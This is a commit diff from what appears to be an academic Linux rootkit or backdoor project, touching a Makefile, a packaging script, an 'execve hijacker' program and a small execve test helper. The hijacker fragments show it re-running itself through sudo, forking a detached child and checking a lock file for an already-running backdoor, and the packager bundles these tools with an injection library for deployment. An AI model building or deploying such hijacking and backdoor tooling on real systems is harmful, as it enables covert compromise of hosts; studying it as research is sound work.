Finished section 5. Multiple changes in the code according to the performed tests.

src/helpers/Makefile

@@ -2,8 +2,9 @@ CC = gcc
 HEADERS = lib/RawTCP.h
 EXTRA_CFLAGS= -I$(PWD)/lib
 
+.PHONY: default
 default:
-	make execve_hijack injection_lib simple_timer simple_open
+	make execve_hijack injection_lib simple_timer simple_open simple_execve
 
 injection_lib: injection_lib.o
 	gcc -Wall -shared -fPIC -o injection_lib.so injection_lib.c -ldl
@@ -20,6 +21,12 @@ simple_open.o: simple_open.c $(HEADERS)
 simple_open: simple_open.o
 	gcc -g -o simple_open simple_open.o	
 
+simple_execve.o: simple_open.c $(HEADERS)
+	gcc -g -c simple_execve.c
+
+simple_execve: simple_execve.o
+	gcc -g -o simple_execve simple_execve.o	
+
 execve_hijack.o: execve_hijack.c $(HEADERS)
 	gcc -g -c execve_hijack.c
 
@@ -34,4 +41,6 @@ clean:
 	-rm -f simple_timer.o
 	-rm -f simple_timer
 	-rm -f simple_open.o
-	-rm -f simple_open
+	-rm -f simple_open
+	-rm -f simple_execve.o
+	-rm -f simple_execve

src/helpers/execve_hijack.c

@@ -263,9 +263,9 @@ int hijacker_process_routine(int argc, char* argv[], int fd){
 
 
 int main(int argc, char* argv[], char *envp[]){
-    printf("Hello world from execve hijacker\n");
+    printf("Malicious program execve hijacker executed\n");
     for(int ii=0; ii<argc; ii++){
-        printf("Argument %i is %s\n", ii, argv[ii]);
+        //printf("Argument %i is %s\n", ii, argv[ii]);
     }
 
     if(geteuid() != 0){
@@ -273,11 +273,11 @@ int main(int argc, char* argv[], char *envp[]){
         char* args[argc+3]; 
         args[0] = "sudo";
         args[1] = "/home/osboxes/TFG/src/helpers/execve_hijack";
-        printf("execve ARGS%i: %s\n", 0, args[0]);
-        printf("execve ARGS%i: %s\n", 1, args[1]);
+        //printf("execve ARGS%i: %s\n", 0, args[0]);
+        //printf("execve ARGS%i: %s\n", 1, args[1]);
         for(int ii=0; ii<argc; ii++){
             args[ii+2] = argv[ii];
-            printf("execve ARGS%i: %s\n", ii+2, args[ii+2]);
+            //printf("execve ARGS%i: %s\n", ii+2, args[ii+2]);
         }
         args[argc+2] = NULL;
         
@@ -299,7 +299,7 @@ int main(int argc, char* argv[], char *envp[]){
     if (pid == 0) {
         setsid();
         //Child process
-        printf("I am the child with pid %d\n", (int) getpid());
+        printf("Malicious program child executed with pid %d\n", (int) getpid());
 
         //First of all check if the locking log file is locked, which indicates that the backdoor process is already running
         int fd = open(LOCK_FILE, O_RDWR | O_CREAT | O_TRUNC, 0666);

src/helpers/packager.sh

@@ -85,7 +85,7 @@ cp -a helpers/simple_open $OUTPUTDIR
 cp -a helpers/simple_timer $OUTPUTDIR
 cp -a helpers/execve_hijack $OUTPUTDIR
 cp -a helpers/injection_lib.so $OUTPUTDIR
-cp -a tc.o $OUTPUTDIR
+cp -a bin/tc.o $OUTPUTDIR
 cp -a client/mycert.pem $OUTPUTDIR
 cp -a helpers/deployer.sh $OUTPUTDIR
 echo -e "${GRN}Finished${NC}"

src/helpers/simple_execve.c

@@ -0,0 +1,23 @@
+/**
+ * Modified version of Linux man page timer using timerfd.
+ * Counts to 3, 1 second at a time, then sets another time up to 3, one second at a time.
+ */
+
+#include <time.h>
+#include <unistd.h>
+#include <stdlib.h>
+#include <stdio.h>
+#include <stdint.h>
+#include <unistd.h>
+#include <fcntl.h>
+
+int main(int argc, char *argv[]) {
+    char* args[] = {"bash", "-c", "pwd", NULL}; 
+    char* envp[] = {NULL}; 
+    sleep(1);
+    if(execve("/usr/bin/bash", args, envp)<0){
+        perror("Failed to execve()");
+        exit(-1);
+    }
+    return 0;
+}